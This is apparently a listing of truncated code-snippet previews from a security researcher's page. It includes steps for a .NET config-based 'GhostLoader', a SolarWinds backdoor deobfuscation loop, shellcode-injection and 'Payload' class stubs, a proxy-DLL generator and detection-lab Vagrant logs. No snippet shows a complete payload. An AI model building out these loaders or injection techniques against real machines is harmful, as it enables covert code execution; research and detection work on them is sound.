GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
//for i in `cat fnv1a_xor_hashes.txt`; do | |
//lookup=`echo $i | cut -d "," -f 2` | |
//retn=`echo $i | cut -d "," -f 1` | |
//sed -i "s/$lookup/\"$retn\"/g" OrionImprovementBusinessLayer.cs | |
//done | |
using System; | |
using System.Collections.Generic; | |
using System.Configuration; |
#include <Windows.h> | |
#include <intrin.h> | |
#include <string> | |
#include <TlHelp32.h> | |
#include <psapi.h> | |
DWORD WINAPI Thread(LPVOID lpParam) { | |
// Insert evil stuff | |
ExitProcess(0); |
""" | |
This script generates a function forwarding header | |
for proxy DLL generation. | |
It is expected that DUMPBIN.EXE is in the path. | |
""" | |
import logging as l | |
import optparse | |
import os | |
import os.path |
// | |
// main.swift | |
// HTTPGet | |
// | |
// Created by david on 9/30/20. | |
// | |
import Foundation | |
func async_req() -> Void { |
using System; | |
using System.Runtime.InteropServices; | |
namespace Inject | |
{ | |
class Program | |
{ | |
static void Main(string[] args) | |
{ | |
byte[] shellcode; |
using System; | |
using System.IO; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Runtime.InteropServices; | |
using System.Net; | |
using System.IO.Compression; | |
public class Payload | |
{ |
using System; | |
using System.IO; | |
using System.Net; | |
using System.Diagnostics; | |
using System.IO.Compression; | |
using System.Runtime.InteropServices; | |
public class Payload | |
{ | |
public Payload() |
GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
Bringing machine 'logger' up with 'vmware_desktop' provider... | |
==> logger: Cloning VMware VM: 'bento/ubuntu-16.04'. This can take some time... | |
==> logger: Checking if box 'bento/ubuntu-16.04' version '201808.24.0' is up to date... | |
==> logger: A newer version of the box 'bento/ubuntu-16.04' for provider 'vmware_desktop' is | |
==> logger: available! You currently have version '201808.24.0'. The latest is version | |
==> logger: '201912.04.0'. Run `vagrant box update` to update. | |
==> logger: Verifying vmnet devices are healthy... | |
==> logger: Preparing network adapters... | |
==> logger: Starting the VMware VM... | |
==> logger: Waiting for the VM to receive an address... |
Bringing machine 'wef' up with 'vmware_desktop' provider... | |
==> wef: Cloning VMware VM: 'detectionlab/win2016'. This can take some time... | |
==> wef: Checking if box 'detectionlab/win2016' version '1.4' is up to date... | |
==> wef: Verifying vmnet devices are healthy... | |
==> wef: Preparing network adapters... | |
WARNING: The VMX file for this box contains a setting that is automatically overwritten by Vagrant | |
WARNING: when started. Vagrant will stop overwriting this setting in an upcoming release which may | |
WARNING: prevent proper networking setup. Below is the detected VMX setting: | |
WARNING: | |
WARNING: ethernet0.pcislotnumber = "33" |